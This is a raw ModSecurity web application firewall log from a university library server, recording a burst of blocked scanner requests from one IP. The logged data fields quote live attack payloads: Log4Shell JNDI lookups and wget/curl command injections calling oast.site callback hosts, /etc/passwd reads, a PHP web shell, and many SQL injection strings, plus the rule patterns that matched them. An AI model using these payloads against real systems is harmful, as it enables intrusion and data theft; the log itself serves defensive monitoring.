[Tue Aug 29 11:34:27.544056 2023] [:error] [pid 1301] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/snippets.inc.php"] [unique_id "ZO11U8Co-f0AAAUVDNQAAABL"]
[Tue Aug 29 11:34:29.328256 2023] [:error] [pid 1252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlgpb3dpf893nsob.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11VcCo-f0AAATkXrIAAAAp"]
[Tue Aug 29 11:34:29.364983 2023] [:error] [pid 1282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VcCo-f0AAAUCJccAAAA6"]
[Tue Aug 29 11:34:29.439039 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VcCo-f0AAAT@KuUAAAA2"]
[Tue Aug 29 11:34:30.324396 2023] [:error] [pid 1280] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlgk5ouaqo78hbmk.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAAUAmQcAAAA4"]
[Tue Aug 29 11:34:30.419904 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlgfmdwcci7nfafc.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/_search"] [unique_id "ZO11VsCo-f0AAAQKOu4AAAAs"]
[Tue Aug 29 11:34:31.425401 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11V8Co-f0AAASEJWUAAAAE"]
[Tue Aug 29 11:34:32.301492 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WMCo-f0AAAPLwIkAAAAX"]
[Tue Aug 29 11:34:32.332841 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WMCo-f0AAAPLwIoAAAAX"]
[Tue Aug 29 11:34:33.325632 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WcCo-f0AAAUbgzsAAABQ"]
[Tue Aug 29 11:34:35.308811 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11W8Co-f0AAATfd2sAAAAk"]
[Tue Aug 29 11:34:37.303883 2023] [:error] [pid 1281] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11XcCo-f0AAAUB004AAAA5"]
[Tue Aug 29 11:34:38.317466 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlggbc3cqab898si.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/upload"] [unique_id "ZO11XsCo-f0AAASI0DcAAAAG"]
[Tue Aug 29 11:34:38.318983 2023] [:error] [pid 1262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlg6txhgqj8xtr7z.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11XsCo-f0AAATus0QAAAAv"]
[Tue Aug 29 11:34:38.331888 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11XsCo-f0AAAUIz60AAABA"]
[Tue Aug 29 11:34:41.322662 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YcCo-f0AAATmZc0AAAAr"]
[Tue Aug 29 11:34:42.316110 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11YsCo-f0AAAUFdeoAAAA9"]
[Tue Aug 29 11:34:44.322271 2023] [:error] [pid 1279] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAAT-IYIAAAA3"]
[Tue Aug 29 11:34:49.292464 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11acCo-f0AAAUIz7cAAABA"]
[Tue Aug 29 11:34:49.308780 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11acCo-f0AAASI0EEAAAAG"]
[Tue Aug 29 11:34:49.318390 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11acCo-f0AAATPtRoAAAAM"]
[Tue Aug 29 11:34:49.345705 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO11acCo-f0AAAShCZYAAAAi"]
[Tue Aug 29 11:34:51.576892 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAASI0EQAAAAG"]
[Tue Aug 29 11:34:51.936890 2023] [:error] [pid 1282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11a8Co-f0AAAUCJdwAAAA6"]
[Tue Aug 29 11:34:52.323050 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bMCo-f0AAASI0EUAAAAG"]
[Tue Aug 29 11:34:53.316143 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgp7kcxpfbarhsk.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11bcCo-f0AAATzVIYAAAAx"]
[Tue Aug 29 11:34:53.359147 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/compliancepolicies.inc.php"] [unique_id "ZO11bcCo-f0AAAUZcFoAAABO"]
[Tue Aug 29 11:34:53.383066 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bcCo-f0AAAUKhAQAAABC"]
[Tue Aug 29 11:34:55.302121 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11b8Co-f0AAASOUpUAAAAR"]
[Tue Aug 29 11:34:56.337437 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/login.php"] [unique_id "ZO11cMCo-f0AAAUOaUUAAABG"]
[Tue Aug 29 11:34:56.352621 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11cMCo-f0AAARjjXUAAAAL"]
